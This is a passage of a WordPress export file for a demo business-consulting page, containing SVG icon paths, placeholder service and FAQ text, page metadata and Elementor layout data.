19.366-6.636l37.261-28.918c13.578-10.538 24.749-24.267 32.308-39.702s11.554-32.678 11.554-49.866v-76.137c0-6.877-5.595-12.511-12.471-12.562l-11.326-.082c-12.598-.091-22.805-1.715-30.964-3.98l40.855-69.179 91.634-.143-61.47 59.654c-2.947 2.861-3.018 7.57-.157 10.519 1.459 1.502 3.398 2.258 5.339 2.258 1.866 0 3.735-.698 5.18-2.101l10.856-10.535h29.081c11.34 0 20.567-9.226 20.567-20.566 0-7.553-4.105-14.151-10.19-17.727l22.191-21.535 23.463-.037c6.462-.012 12.773-1.254 18.756-3.695l36.925-15.059c9.181-3.745 14.875-12.23 14.857-22.145-.011-9.916-5.734-18.383-14.927-22.095zm-111.636 96.602c3.137 0 5.69 2.552 5.69 5.69 0 3.136-2.552 5.689-5.69 5.689h-13.751l11.724-11.378h2.027zm0-157.927c3.137 0 5.69 2.552 5.69 5.69 0 3.137-2.552 5.69-5.69 5.69h-.629l-11.726-11.379h12.355zm106.094 91.789-36.925 15.059c-4.2 1.712-8.628 2.585-13.163 2.593l-195.645.306c-.003 0-.007 0-.01 0-.442 0-.886-.03-1.325-.09l-73.178-12.541c-2.016-.346-4.092.156-5.73 1.389l-51.403 38.691-14.976.025 32.007-49.102c1.615-2.477 1.609-5.675-.015-8.146l-32.177-48.991 14.975-.025 51.538 38.513c1.643 1.226 3.719 1.72 5.734 1.369l73.138-12.796c.438-.062.882-.093 1.325-.094l113.263-.177c4.109-.007 7.434-3.342 7.427-7.45-.007-4.105-3.336-7.427-7.439-7.427-.004 0-.008 0-.012 0l-54.228.085-75.886-128.503 34.698.022c.06 0 .116.022.159.064l132.182 128.277-1.783.003c-4.108.007-7.433 3.343-7.426 7.451.007 4.104 3.336 7.426 7.439 7.426h.013l47.247-.078h.063c4.512 0 8.923.857 13.109 2.546l36.976 14.931c5.212 2.105 5.625 6.904 5.628 8.325 0 1.421-.396 6.222-5.6 8.345z"></path><path d="m234.902 173.999c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.325-4.324-9.639-9.649-9.635z"></path><path d="m270.583 173.976c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.004-5.324-4.323-9.638-9.649-9.635z"></path><path d="m305.624 173.954c-5.325.003-9.639 4.323-9.636 9.648s4.323 9.639 9.648 9.635c5.325-.003 9.639-4.323 9.635-9.648-.003-5.325-4.322-9.639-9.647-9.635z"></path><path d="m341.305 173.931c-5.325.003-9.639 4.323-9.635 9.648.003 5.325 4.323 9.639 9.648 9.635 5.325-.003 9.639-4.323 9.636-9.648-.005-5.324-4.324-9.638-9.649-9.635z"></path><path d="m150.203 316.284c-10.855 3.962-22.954 6.715-35.961 8.183-5.408.611-9.486 5.179-9.486 10.628v51.148c0 27.281 12.36 52.522 33.911 69.248l32.996 25.608c1.932 1.501 4.247 2.251 6.562 2.251s4.629-.75 6.559-2.249l32.997-25.61c21.551-16.726 33.912-41.965 33.912-69.248v-51.148c0-5.45-4.08-10.02-9.487-10.628-13.006-1.467-25.105-4.221-35.96-8.183-7.22-2.635-13.734-5.768-19.359-9.314-5.262-3.318-12.062-3.317-17.324-.001-5.627 3.546-12.14 6.681-19.36 9.315zm28.749 3.271c6.519 4.109 13.986 7.71 22.193 10.706 10.908 3.98 22.892 6.847 35.67 8.534v47.448c0 22.652-10.262 43.608-28.157 57.495l-30.435 23.621-30.435-23.621c-17.894-13.888-28.156-34.843-28.156-57.495v-47.448c12.779-1.687 24.761-4.553 35.67-8.534 8.209-2.996 15.676-6.598 22.193-10.706.449-.283 1.008-.283 1.457 0z"></path><path d="m145.068 374.175c-3.261 2.498-3.88 7.167-1.382 10.429l23.844 31.134c1.397 1.823 3.557 2.899 5.854 2.915h.051c2.278 0 4.431-1.044 5.843-2.835l43-54.567c2.543-3.226 1.989-7.904-1.239-10.446-3.224-2.543-7.904-1.988-10.446 1.239l-37.073 47.046-18.023-23.533c-2.497-3.26-7.164-3.879-10.429-1.382z"></path></g></svg>
<h5><a href="#">Financial Services</a></h5>
We help financial institutions, from banking and insurance to wealth.

<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 -9 512.00092 512"><path d="m243.273438 147.371094c-4.140626 0-7.5 3.359375-7.5 7.5v74.769531c0 4.144531 3.359374 7.5 7.5 7.5 4.144531 0 7.5-3.355469 7.5-7.5v-74.769531c0-4.140625-3.359376-7.5-7.5-7.5zm0 0"></path><path d="m152.441406 383.160156 64.75-37.386718c3.589844-2.070313 4.816406-6.65625 2.746094-10.242188s-6.660156-4.816406-10.242188-2.746094l-64.753906 37.386719c-3.585937 2.070313-4.816406 6.65625-2.746094 10.242187 2.082032 3.605469 6.675782 4.808594 10.246094 2.746094zm0 0"></path><path d="m383.484375 349.453125-64.753906-37.386719c-3.589844-2.070312-8.175781-.839844-10.246094 2.746094s-.839844 8.171875 2.746094 10.242188l64.753906 37.386718c1.179687.679688 2.46875 1.003906 3.742187 1.003906 2.589844 0 5.113282-1.34375 6.5-3.75 2.070313-3.585937.84375-8.171874-2.742187-10.242187zm0 0"></path><path d="m63.074219 331.53125c.371093 0 .75-.027344 1.128906-.085938 4.097656-.617187 6.914063-4.4375 6.292969-8.535156-1.378906-9.132812-2.078125-18.472656-2.078125-27.757812 0-71.730469 41.214843-135.011719 103.09375-165.410156 3.71875-1.828126 5.253906-6.320313 3.425781-10.039063-1.824219-3.714844-6.316406-5.25-10.035156-3.425781-67.039063 32.929687-111.484375 101.449218-111.484375 178.875 0 10.035156.757812 20.125 2.25 30 .558593 3.714844 3.757812 6.378906 7.40625 6.378906zm0 0"></path><path d="m170.335938 166.796875c-43.941407 28.21875-70.171876 76.203125-70.171876 128.355469 0 3.332031.117188 6.808594.355469 10.34375.273438 4.101562 3.8125 7.257812 7.980469 6.984375 4.132812-.277344 7.261719-3.855469 6.984375-7.984375-.214844-3.203125-.324219-6.347656-.324219-9.34375 0-47.023438 23.65625-90.289063 63.28125-115.738282 3.484375-2.238281 4.496094-6.875 2.257813-10.359374-2.238281-3.488282-6.878907-4.496094-10.363281-2.257813zm0 0"></path><path d="m320.199219 123.789062c8.589843 3.398438 17.015625 7.492188 25.039062 12.160157 62.003907 36.074219 95.972657 103.523437 91.128907 172.296875-.292969 4.128906 2.820312 7.714844 6.953124 8.007812.179688.011719.355469.015625.535157.015625 3.898437 0 7.195312-3.019531 7.472656-6.972656 5.25-74.5-31.621094-147.375-98.546875-186.3125-8.671875-5.042969-17.773438-9.464844-27.0625-13.144531-3.851562-1.523438-8.210938.363281-9.734375 4.214844-1.523437 3.851562.363281 8.207031 4.214844 9.734374zm0 0"></path><path d="m313.492188 171.933594c2.867187 1.421875 5.640624 2.90625 8.234374 4.417968 40.648438 23.648438 66.148438 65.855469 68.21875 112.902344.175782 4.023438 3.496094 7.167969 7.484376 7.167969.113281 0 .226562 0 .335937-.007813 4.140625-.179687 7.34375-3.683593 7.164063-7.820312-2.296876-52.171875-30.578126-98.976562-75.660157-125.207031-2.882812-1.675781-5.953125-3.324219-9.117187-4.890625-3.710938-1.839844-8.210938-.320313-10.050782 3.386718-1.839843 3.710938-.320312 8.210938 3.390626 10.050782zm0 0"></path><path d="m371.164062 436.148438c-7.078124 5.9375-14.6875 11.398437-22.609374 16.234374-61.472657 37.511719-136.953126 35-194.902344-1.839843-3.492188-2.222657-8.132813-1.191407-10.351563 2.304687-2.222656 3.496094-1.191406 8.128906 2.304688 10.351563 63.878906 40.613281 145.515625 41.800781 210.761719 1.984375 8.5625-5.222656 16.78125-11.125 24.4375-17.542969 3.171874-2.664063 3.585937-7.390625.925781-10.566406-2.660157-3.171875-7.390625-3.589844-10.566407-.925781zm0 0"></path><path d="m332.015625 425.285156c2.855469-1.738281 5.761719-3.65625 8.648437-5.695312 3.382813-2.386719 4.1875-7.066406 1.796876-10.449219-2.390626-3.382813-7.066407-4.1875-10.453126-1.800781-2.609374 1.847656-5.234374 3.574218-7.804687 5.140625-40.136719 24.5-89.390625 26.84375-131.757813 6.273437-3.726562-1.808594-8.214843-.253906-10.023437 3.472656-1.808594 3.722657-.253906 8.210938 3.472656 10.019532 46.933594 22.789062 101.5625 20.230468 146.121094-6.960938zm0 0"></path><path d="m506.246094 418.738281-153.742188-142.207031c-1.605468-1.488281-3.773437-2.199219-5.953125-1.945312l-45.195312 5.210937c-1.582031-5-3.917969-9.667969-6.863281-13.875l-6.4375-176.585937c-.148438-4.136719-3.628907-7.382813-7.765626-7.21875-4.140624.148437-7.371093 3.628906-7.222656 7.765624l5.882813 161.445313c-15.636719-9.433594-35.507813-9.710937-51.355469-.75l-24.09375-32.464844 45.523438-200.886719c.296874-1.3125 1.445312-2.226562 2.789062-2.226562h15.765625c1.546875 0 2.800781 1.210938 2.859375 2.753906l1.707031 46.886719c.152344 4.140625 3.652344 7.359375 7.769531 7.21875 4.136719-.148437 7.371094-3.625 7.222657-7.765625l-1.710938-46.886719c-.351562-9.648437-8.191406-17.207031-17.847656-17.207031h-15.765625c-8.398438 0-15.5625 5.722656-17.414062 13.910156l-46.285157 204.25c-.484375 2.132813-.011719 4.371094 1.289063 6.125l26.355468 35.511719c-7.160156 7.457031-12.089843 17.070313-13.6875 27.757813l-193.675781 121.4375c-8.183593 5.128906-10.808593 15.699218-5.980469 24.058593l7.882813 13.65625c3.273437 5.664063 9.167969 8.941407 15.40625 8.941407 1.773437 0 3.574219-.265626 5.351563-.816407l45.554687-14.128906c3.957031-1.226563 6.171875-5.429687 4.941406-9.382813-1.226562-3.957031-5.425781-6.167968-9.382812-4.941406l-45.558594 14.128906c-1.28125.398438-2.652344-.136718-3.324219-1.300781l-7.882812-13.65625c-.773438-1.335937-.351563-3.027343.957031-3.851562l186.105469-116.6875c3.703125 18.878906 17.835937 34.054687 36.125 39.28125l-15.246094 35.195312-123.925781 38.4375c-3.957031 1.226563-6.167969 5.425781-4.941407 9.382813 1.226563 3.957031 5.429688 6.167968 9.386719 4.941406l127.21875-39.457031c2.085938-.648438 3.789063-2.175781 4.660157-4.183594l18.359374-42.386719c1.921876-.054687 3.816407-.214844 5.679688-.476562l218.09375 115.535156c2.683594 1.421875 5.558594 2.101562 8.390625 2.101562 6.167969 0 12.125-3.21875 15.433594-8.949218l7.886719-13.65625c4.195312-7.273438 2.824218-16.335938-3.339844-22.039063zm-253.636719-87.476562c-20.011719 0-36.109375-16.453125-36.109375-36.109375 0-19.941406 16.238281-36.105469 36.109375-36.105469 19.875 0 36.105469 16.195313 36.105469 36.105469 0 19.675781-15.972656 36.109375-36.105469 36.109375zm243.984375 102.015625-7.882812 13.65625c-.769532 1.335937-2.441407 1.820312-3.8125 1.09375l-205.929688-109.089844c15.308594-9.246094 24.945312-26.113281 24.742188-44.3125l41.136718-4.746094 151.214844 139.871094c.984375.914062 1.207031 2.363281.53125 3.527344zm0 0"></path></svg>
<h5><a href="#">Natural Resources</a></h5>
We help financial institutions, from banking and insurance to wealth.
<h6>how we help</h6>
<h3>Align Costs with Strategy &amp; Focus on Growth</h3>
<a href="http://wpdemo.archiwp.com/maxbizz-business/blog/">get in touch</a>
<h4>How It Works &amp; How We Do It</h4>
We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.

Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.
<h6>marketing analysis</h6>
<h6>finance strategy</h6>
<h6>business innovation</h6>
<h6>CORPORATE MANAGEMENT</h6>
<blockquote>“I cannot give you the formula for success, but I can give you the
formula for failure. It is: Try to please everybody.”
<cite>david oswald</cite></blockquote>
<h4>Business Planning &amp; Strategy</h4>
In what areas do you provide management consulting?

Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.

In which countries do you provide consulting services?

Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.

How is a consulting project started and organized?

Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>977</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 08:25:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 08:25:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[business-consulting]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"2c774f8","elType":"section","settings":{"gap":"extended","structure":"20","padding":{"unit":"px","top":"90","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"6bc8536","elType":"column","settings":{"_column_size":50,"_inline_size":25,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"ed430ae","elType":"widget","settings":{"title":"Services","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"017708c","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"f67d26f","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"977088c","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9348f7e","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"786190f","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"343704f","elType":"widget","settings":{"icon_list":[{"text":"marketing research","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"c162572","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/marketing-research","is_external":"","nofollow":"","custom_attributes":""}},{"text":"Organizational Audit","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"b64d52f","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/organizational-audit\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"business consulting","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"884375d","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/business-consulting","is_external":"","nofollow":"","custom_attributes":""}},{"text":"project management","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"2f35702","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/project-management\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"support functions","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"6aee619","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/support-function\/","is_external":"","nofollow":"","custom_attributes":""}},{"text":"finance planning","selected_icon":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/black-circle.svg","id":782},"library":"svg"},"_id":"cd97531","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/our-services\/finance-planning\/","is_external":"","nofollow":"","custom_attributes":""}}],"space_between":{"unit":"px","size":15,"sizes":[]},"icon_color":"#D92300","icon_size":{"unit":"px","size":6,"sizes":[]},"text_color":"#1B1D21","text_color_hover":"#D92300","text_indent":{"unit":"px","size":10,"sizes":[]},"icon_typography_typography":"custom","icon_typography_font_family":"Inter","icon_typography_font_size":{"unit":"px","size":13,"sizes":[]},"icon_typography_font_weight":"600","icon_typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"icon-list"},{"id":"a0bb326","elType":"widget","settings":{"title":"Brochures","header_size":"h5"},"elements":[],"widgetType":"heading"},{"id":"f12bdfe","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"1396f28","elType":"column","settings":{"_column_size":50,"_inline_size":78,"_inline_size_mobile":78},"elements":[{"id":"4fa4a55","elType":"widget","settings":{"text":"Divider","color":"#00000026","gap":{"unit":"px","size":20,"sizes":[]},"_css_classes":"widget-title"},"elements":[],"widgetType":"divider"}],"isInner":true},{"id":"9af4798","elType":"column","settings":{"_column_size":50,"_inline_size":22,"_inline_size_mobile":22},"elements":[{"id":"d4ee160","elType":"widget","settings":{"text":"Divider","color":"#D92300","weight":{"unit":"px","size":3,"sizes":[]},"gap":{"unit":"px","size":21,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"17","isLinked":false}},"elements":[],"widgetType":"divider"}],"isInner":true}],"isInner":true},{"id":"60ffced","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/img-btn-pdf-home3.jpg","id":1705},"image_size":"full","align":"left","link_to":"custom","link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"image_border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"904e2fa","elType":"column","settings":{"_column_size":50,"_inline_size":75,"_inline_size_tablet":100},"elements":[{"id":"3c3d54a","elType":"widget","settings":{"title":"Strategic & Tactical Planning","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":32,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"dec0c01","elType":"widget","settings":{"editor":"<p>It\u2019s a daunting challenge: How do you move forward at speed despite enormous uncertainty? Radar Strategy provides the answer. Our unique \"Today Forward, Future Back\" approach enables you to create value now as you move toward your future vision, with the flexibility to adapt as scenarios change. We\u2019ll help you make critical choices and choreograph your transformation journey as you bring your core to full potential and build new growth engines.<\/p><p>Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks: an outside-in approach that puts customers first, a uniquely great customer experience and internal capabilities that ensure you deliver optimal customer interactions at every touchpoint.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"e91e771","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"122c65b","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"7bddef1","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":631},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"522b33e","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/business-and-finance.svg","id":637},"library":"svg"},"title":"Government Services","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true},{"id":"e34cba3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"8022263","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/holidays.svg","id":643},"library":"svg"},"title":"Financial Services","des":"We help financial institutions, from banking and insurance to wealth.","icon_size":{"unit":"px","size":46,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"iiconbox2"},{"id":"8ba35e7","elType":"widget","settings":{"icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/energy.svg","id":980},"library":"svg"},"title":"Natural Resources","des":"We help financial institutions, from banking and insurance to wealth."},"elements":[],"widgetType":"iiconbox2"}],"isInner":true}],"isInner":true},{"id":"ce7cc23","elType":"section","settings":{"layout":"full_width","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail3.jpg","id":982},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"padding":{"unit":"px","top":"70","right":"0","bottom":"70","left":"100","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"e61a616","elType":"column","settings":{"_column_size":50,"_inline_size":45.695999999999997953636921010911464691162109375,"_inline_size_tablet":80},"elements":[{"id":"4c16558","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"65dee06","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h3","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"7ab0f67","elType":"widget","settings":{"btn_style":"light","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz-business\/blog\/","is_external":"","nofollow":"","custom_attributes":""},"button_text_color":"#FFFFFF"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"abd3090","elType":"column","settings":{"_column_size":50,"_inline_size":54.304000000000002046363078989088535308837890625},"elements":[],"isInner":true}],"isInner":true},{"id":"29089d9","elType":"section","settings":{"layout":"full_width","gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"0","right":"0","bottom":"65","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"e0d31db","elType":"column","settings":{"_column_size":50,"_inline_size":46,"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false}},"elements":[{"id":"c0c4b49","elType":"widget","settings":{"title":"How It Works & How We Do It","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"typography_typography":"custom","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"1507a17","elType":"widget","settings":{"editor":"<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.<\/p><p>Integrating of innovation and public benefit into your workflows; ensuring strategic and sustainable development of your organization from project.<\/p>"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"6bfd814","elType":"column","settings":{"_column_size":50,"_inline_size":54},"elements":[{"id":"ad31a08","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"2ef81ea","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"d8149bc","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"},{"id":"97cbbb6","elType":"widget","settings":{"title":"CORPORATE MANAGEMENT","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false},"lbar_color":"#D92300"},"elements":[],"widgetType":"iprogress"}],"isInner":true}],"isInner":true},{"id":"206ff31","elType":"section","settings":{"gap":"extended","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"10","right":"10","bottom":"10","left":"10","isLinked":true},"margin":{"unit":"px","top":"0","right":0,"bottom":"65","left":0,"isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":0,"bottom":"50","left":0,"isLinked":false},"padding":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"187c777","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"15a4ea5","elType":"widget","settings":{"editor":"<blockquote>\u201cI cannot give you the formula for success, but I can give you the \nformula for failure. It is: Try to please everybody.\u201d\n<cite>david oswald<\/cite><\/blockquote>","_margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"90","bottom":"0","left":"90","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"15","bottom":"0","left":"15","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true},{"id":"ec27098","elType":"widget","settings":{"title":"Business Planning & Strategy","header_size":"h4","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"8eca34c","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"75ae542"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"a85daa6"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.<\/p>","_id":"8e79519"}]},"elements":[],"widgetType":"iaccordions"}],"isInner":false}],"isInner":false}]]]></wp:meta_value>
